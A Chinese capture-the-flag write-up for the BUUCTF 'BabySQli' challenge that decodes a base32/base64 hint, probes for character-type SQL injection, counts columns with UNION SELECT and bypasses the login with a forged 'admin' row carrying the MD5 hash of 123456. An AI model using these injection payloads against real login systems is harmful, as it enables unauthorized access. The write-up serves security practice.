【BUUCTF】[GXYCTF2019]BabySQli

进入页面如下

尝试万能密码注入

显示这个(qyq)

用burp suite抓包试试

发现注释处是某种编码像是base编码格式

MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5

可以使用下面这个网页在线工具很方便

Base64解码 Base64编码 UTF8 GB2312 UTF16 GBK 二进制 十六进制 解密 - The X 在线工具

先进行一次base32编码解码一次得到的内容有两个=,再用base64编码再次解码

得到一个sql语句

select * from user where username = '$name'

发现注入点应该在name处

判断是字符型注入还是整数型注入

name=1'&pw=1

报错,故判断是字符型注入

判断字段数

order by用不了了,应该是被过滤了

name=1' union select 1,2#&pw=1

页面错误

name=1' union select 1,2,3#&pw=1

页面正常

故字段数为3

判断注入点在哪里

这道题不能直接用数字试,只能用admin试时才会显示wrong pass!

最终试出注入点在中间

查看题中给出的源码

发现带有flag的代码

提示md5加密,可以试试下面这个在线页面md5加密很好用

md5在线解密破解,md5解密加密

使用最常用的123456密码

最终得到flag

name=1'union select 1,'admin','e10adc3949ba59abbe56e057f20f883e' #&pw=123456

相关推荐
依然范特东4 分钟前
动手学深度学习笔记--训练注意、梯度问题
人工智能·笔记·深度学习
隔壁阿布都9 分钟前
MySQL 间隙锁死锁问题处理
数据库·mysql
qiuziqiqi1 小时前
Shopify推送订单及异常状态错误码说明
数据库
希望奇迹很安静1 小时前
数通基本实验
运维·服务器·网络
三品PLM系统2 小时前
【无标题】
数据库·制造·cadence·plm
ITxiaobing20232 小时前
如何构建IP维度的假量排查流程:以AppsFlyer Protect360判假后的实战为例
网络·数据库
Eloudy2 小时前
基于 RDMA-CM(librdmacm)的聊天程序
网络·人工智能
fanchenxinok3 小时前
学习笔记:LabVIEW中如何将解析S19/HEX的VI封装为子VI并供主VI调用
笔记·学习·labview·子vi
(Charon)3 小时前
【C/C++】手写内存池(三):大块内存的申请、记录与单独释放
网络
ywl4708120873 小时前
mysql 锁定读和非锁定读
数据库·mysql